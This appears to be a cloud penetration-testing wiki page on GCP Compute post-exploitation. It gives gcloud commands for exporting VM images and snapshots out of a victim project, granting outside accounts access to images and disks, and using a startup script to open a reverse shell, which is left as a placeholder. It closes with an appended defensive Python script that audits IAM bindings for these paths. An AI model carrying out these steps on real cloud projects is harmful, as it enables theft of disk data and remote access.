GCP - Compute Post Exploitation


Compute

For more information about Compute and VPC (Networking) check:

GCP - Compute Enum

Export & Inspect Images locally

This would allow an attacker to access the data contained inside already existing images, or to create new images of running VMs and access their data, without having access to the running VM.

It is possible to export a VM image to a bucket and then download it and mount it locally with the command:

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# Then download the export from the bucket and mount it locally

Before performing this action the attacker might need privileges over the storage bucket and certainly privileges over cloudbuild, as it is the service that will be asked to perform the export. Moreover, for this to work, the cloudbuild SA and the compute SA need privileged permissions. The cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com needs:

  • roles/iam.serviceAccountTokenCreator

  • roles/compute.admin

  • roles/iam.serviceAccountUser

And the SA <project-id>-compute@developer.gserviceaccount.com needs:

  • roles/compute.storageAdmin

  • roles/storage.objectAdmin

Export & Inspect Snapshots & Disks locally

It is not possible to export snapshots and disks directly, but it is possible to transform a snapshot into a disk, a disk into an image and, following the previous section, export that image to inspect it locally.

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

Inspect an Image creating a VM

With the goal of accessing the data stored in an image, or inside a running VM from which an attacker has created an image, it is possible to grant an external account access over the image:

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'

and then create a new VM from it:

gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

If you cannot give your external account access over the image, you can launch a VM using that image in the victim's project and make the metadata execute a reverse shell to access the image by adding the param:

--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'

Inspect a Snapshot/Disk attaching it to a VM

With the goal of accessing the data stored in a disk or a snapshot, you can transform the snapshot into a disk, the disk into an image and follow the previous steps.

Or you can grant an external account access over the disk (if the starting point is a snapshot, give access over the snapshot or create a disk from it):

gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'

Attach the disk to an instance:

gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]

Mount the disk inside the VM:

  1. SSH into the VM:

gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]

  2. Identify the Disk: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as /dev/sdb, /dev/sdc, etc.

  3. Format and Mount the Disk (if it's a new or raw disk):

  • Create a mount point:

sudo mkdir -p /mnt/disks/[MOUNT_DIR]

  • Mount the disk:

sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]

If you cannot give an external project access to the snapshot or disk, you might need to perform these actions inside an instance in the same project as the snapshot/disk.
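
A defender-side check for the role bindings used in the export and sharing sections above, as an added example that is not part of the original page: it reads a project IAM policy in the JSON shape returned by gcloud projects get-iam-policy --format=json and reports when both service accounts hold the role sets listed for image export, and when a principal outside an allowlist holds roles/compute.imageUser or roles/compute.storageAdmin. The function names, the trusted_suffixes allowlist and the sample policy are assumptions constructed for illustration.

```python
# Added example: audit a project IAM policy (`get-iam-policy --format=json` shape).
# Role sets the page lists as needed for image export:
CLOUDBUILD_ROLES = {"roles/iam.serviceAccountTokenCreator", "roles/compute.admin",
                    "roles/iam.serviceAccountUser"}
COMPUTE_SA_ROLES = {"roles/compute.storageAdmin", "roles/storage.objectAdmin"}
# Roles the page grants to an outside principal to reach images and disks:
SHARE_ROLES = {"roles/compute.imageUser", "roles/compute.storageAdmin"}

def roles_by_member(policy):
    """Invert the bindings list into {member: set_of_roles}."""
    out = {}
    for binding in policy.get("bindings", []):
        for member in binding.get("members", []):
            out.setdefault(member, set()).add(binding["role"])
    return out

def is_external(member, trusted_suffixes):
    """True for public members or e-mails matching no suffix in the (assumed) allowlist."""
    kind, _, email = member.partition(":")
    if kind in ("allUsers", "allAuthenticatedUsers"):
        return True
    if kind not in ("user", "group", "serviceAccount"):
        return False  # domain:, deleted:... are out of scope for this check
    return not any(email.lower().endswith(s.lower()) for s in trusted_suffixes)

def audit(policy, cloudbuild_sa, compute_sa, trusted_suffixes):
    """Return sorted (finding, member, role) tuples; SA arguments are e-mail addresses."""
    granted = roles_by_member(policy)
    cb, ce = "serviceAccount:" + cloudbuild_sa, "serviceAccount:" + compute_sa
    findings = []
    if CLOUDBUILD_ROLES <= granted.get(cb, set()) and COMPUTE_SA_ROLES <= granted.get(ce, set()):
        findings.append(("export-path-enabled", cb, "*"))
    for member, roles in granted.items():
        if member not in (cb, ce) and is_external(member, trusted_suffixes):
            findings += [("external-share", member, r) for r in roles & SHARE_ROLES]
    return sorted(findings)

# Constructed sample policy: placeholder names, not real data.
CB, CE = "demo@cloudbuild.gserviceaccount.com", "demo-compute@developer.gserviceaccount.com"
SAMPLE = {"bindings": [{"role": r, "members": m} for r, m in [
    ("roles/iam.serviceAccountTokenCreator", ["serviceAccount:" + CB]),
    ("roles/compute.admin", ["serviceAccount:" + CB]),
    ("roles/iam.serviceAccountUser", ["serviceAccount:" + CB]),
    ("roles/storage.objectAdmin", ["serviceAccount:" + CE]),
    ("roles/compute.storageAdmin", ["serviceAccount:" + CE, "user:alice@corp.example"]),
    ("roles/compute.imageUser", ["serviceAccount:vm@other.iam.gserviceaccount.com"]),
]]}
if __name__ == "__main__":
    print(*audit(SAMPLE, CB, CE, ["@corp.example"]), sep="\n")
```

Pass the two service account addresses as they appear in your own project's policy, and list every e-mail suffix you consider internal in trusted_suffixes.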
